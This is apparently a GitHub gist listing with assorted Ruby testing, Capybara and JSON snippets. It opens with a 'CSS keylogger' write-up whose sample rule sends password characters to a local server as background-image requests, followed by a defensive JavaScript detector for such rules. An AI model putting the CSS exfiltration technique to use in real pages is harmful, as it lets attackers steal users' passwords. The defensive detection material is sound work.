Przemyslaw Mroczek Lackoftactics

  • Warsaw, Poland
@Lackoftactics
Lackoftactics / keylogger.md
Created February 21, 2018 17:10
keylogger css

# How it works

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following CSS will select all inputs with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

```css
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
```

Using a simple script one can create a CSS file that will send a custom request for every ASCII character.
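On the defensive side, the pattern described above (a selector on the `value` attribute paired with a `url()` fetch) can be found by static inspection of a stylesheet. The following is an added example, not part of the gist; `findValueExfilRules`, the `https://app.example` origin and the sample stylesheet are constructed for illustration.

```javascript
// Added example, not from the gist: flag CSS rules that pair a selector on an
// element's value attribute with a url() fetch, the pattern described above.
const VALUE_SELECTOR =
  /\[\s*value\s*[$^*~|]?=\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*(?:[is]\s*)?\]/i;
const URL_FETCH = /url\(\s*(["']?)([^"')]+)\1\s*\)/gi;

function findValueExfilRules(cssText, pageOrigin) {
  const findings = [];
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  // Innermost "selector { declarations }" pairs; also reaches rules inside @media.
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selector = m[1].trim();
    if (!VALUE_SELECTOR.test(selector)) continue;
    for (const u of m[2].matchAll(URL_FETCH)) {
      const target = u[2].trim();
      if (/^data:/i.test(target)) continue; // inline data, no network request
      let origin;
      try {
        origin = new URL(target, pageOrigin).origin;
      } catch {
        continue; // unparseable URL
      }
      findings.push({
        selector,
        url: target,
        crossOrigin: origin !== new URL(pageOrigin).origin,
      });
    }
  }
  return findings;
}

// Constructed sample: the gist's rule plus two benign-looking rules.
const SAMPLE_CSS = `
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
input[type="text"] { background-image: url("/img/field.png"); }
@media screen { input[value=""] { background: url(/img/empty.png); } }
`;

// "https://app.example" is an assumed origin for the page under review.
console.log(findValueExfilRules(SAMPLE_CSS, "https://app.example"));
```

Cross-origin hits are the ones to triage first; a restrictive `img-src` in the page's Content-Security-Policy blocks the request itself.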

@Lackoftactics
Lackoftactics / callbacks_hell.rb
Created February 26, 2018 12:03
Smarter tests without workaround
factory :registration_active_registrant, class: Registration::Registrant do
  before(:create) do |registrant|
    registrant.class.skip_callback(:create, :before, :init)
    create(:active_registration_registrant_status) unless Registration::RegistrantStatus.exists?(name: 'Active')
  end
  completed_at Date.current
  activated_at Date.current
  status_id { Registration::RegistrantStatus::ACTIVE_ID }
@Lackoftactics
Lackoftactics / trait.rb
Created February 26, 2018 12:47
factory bot traits
FactoryGirl.define do
  factory :registration_participant, class: Registration::Participant do
    f_name { Faker::Name.first_name }
    l_name { Faker::Name.last_name }
    waiver_agree true
    token SecureRandom.hex(10)
    association :registrant, factory: :registration_registrant
    trait :skip_validate do
      registrant nil
@Lackoftactics
Lackoftactics / kill_by_port.sh
Created March 5, 2018 12:23
Find process by port for later killing
netstat -vanp tcp | grep 3000
@Lackoftactics
Lackoftactics / capybara_debug.rb
Created March 5, 2018 12:59
Capybara easier debugging, look on browser
Capybara.server_port = 9887
Capybara.app_host = "http://#{ENV['APP_HOST']}:#{Capybara.server_port}"
Capybara.always_include_port = true
Capybara.register_driver :chrome do |app|
  Capybara::Selenium::Driver.new(app, browser: :chrome)
end
@Lackoftactics
Lackoftactics / rotate
Created March 6, 2018 12:44
rotate matrix
You are given an n x n 2D matrix that represents an image. Rotate the image by 90 degrees (clockwise).
Example
For
a = [[1, 2, 3],
     [4, 5, 6],
     [7, 8, 9]]
the output should be
def pause_capybara
  $stderr.write "
Capybara paused!
App running at http://localhost:#{Capybara.current_session.server.port}
Press enter to continue..."
  $stdin.gets
end
In Ruby, &method passes you!
Most Rubyists would know what the following does.
[1, 2, 3].map(&:to_s)
It takes the array of numbers, calls to_s on each item, and returns an array of the return values.
But what if you want to do the opposite? Rather than calling a method on the object, what if you want to call a method with the object as a parameter? Simple!
["1", "2", "3"].map(&method(:Integer))
@Lackoftactics
Lackoftactics / index.html
Created July 11, 2018 14:50
Inline style
<textarea name="comment" id="comment" cols="30" rows="30" style="height:60px; width:300px" placeholder="Enter your comment..."></textarea>
@Lackoftactics
Lackoftactics / oj.rb
Created October 7, 2018 00:15
Big note on json parsing
gem 'oj'
gem 'oj_mimic_json'
#this will make you happy
# faster json rendering using oj